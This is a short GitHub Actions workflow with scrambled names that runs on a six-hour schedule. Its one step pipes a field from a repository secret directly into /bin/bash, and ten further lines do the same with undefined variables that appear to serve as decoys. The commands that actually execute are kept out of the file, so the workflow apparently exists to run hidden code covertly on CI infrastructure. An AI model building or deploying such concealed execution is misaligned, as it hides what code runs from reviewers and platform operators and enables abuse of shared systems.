name: tengtexie6789

on:
  workflow_dispatch:
  schedule:
    - cron: '25 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tengtexie6789
        env:
          n606: ${{ secrets.n606 }}
        run: |
          echo $n606 | jq -r .zhat0399 | /bin/bash
          echo $gxi3532 | jq -r .h53 | /bin/bash
          echo $jdjy28068 | jq -r .axkya03464 | /bin/bash
          echo $ocmfy6 | jq -r .c2 | /bin/bash
          echo $nq760 | jq -r .z93342 | /bin/bash
          echo $sdien066 | jq -r .d424 | /bin/bash
          echo $kikc0 | jq -r .dnbk061 | /bin/bash
          echo $vct17433 | jq -r .iie29 | /bin/bash
          echo $cnvf7 | jq -r .am3 | /bin/bash
          echo $hz980 | jq -r .pyuk83 | /bin/bash
          echo $mscv4406 | jq -r .xdec6 | /bin/bash

